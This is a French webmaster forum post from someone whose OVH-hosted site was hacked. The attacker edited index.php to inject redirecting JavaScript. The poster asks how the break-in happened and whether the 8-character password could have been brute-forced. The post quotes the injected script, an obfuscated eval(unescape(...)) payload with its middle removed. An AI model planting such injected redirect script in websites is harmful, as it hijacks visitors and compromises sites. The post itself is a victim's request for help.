WRInaute passionné
Bonjour tout le monde,
J'ai eut la désagréable occasion de constaté avant hier qu'un de mes petits sites hébergé chez ovh en mutu avait été hacké.
La hackeur à modifier le fichier index.php pour y ajouter un javascript :
Le script redirigeant vers un site porno, bien évidement.
Sachant que ce site n'utilise pas de formulaire avec lien vers bdd (risque d'injection sql)
Mes stats ne font pas apparaitre une surfréquentation le jour ou le fichier a été modifié.
Comment pensez-vous que le hackeur à procédé ?
Sachant que les pass fournis par ovh comprennent 8 caracteres alphanumériques avec majuscules et minuscules, pensez-vous que l'attaque puisse s'etre effectuée par une routine essayant chaque combinaison possible ?
J'ai eut la désagréable occasion de constaté avant hier qu'un de mes petits sites hébergé chez ovh en mutu avait été hacké.
La hackeur à modifier le fichier index.php pour y ajouter un javascript :
Code:
<script language="javascript">$="%63a%3d%22%2566u%256ecti.....CONTENU SUPPRIMÉ.....%7d;";eval(unescape($));document.write($);</script>
Le script redirigeant vers un site porno, bien évidement.
Sachant que ce site n'utilise pas de formulaire avec lien vers bdd (risque d'injection sql)
Mes stats ne font pas apparaitre une surfréquentation le jour ou le fichier a été modifié.
Comment pensez-vous que le hackeur à procédé ?
Sachant que les pass fournis par ovh comprennent 8 caracteres alphanumériques avec majuscules et minuscules, pensez-vous que l'attaque puisse s'etre effectuée par une routine essayant chaque combinaison possible ?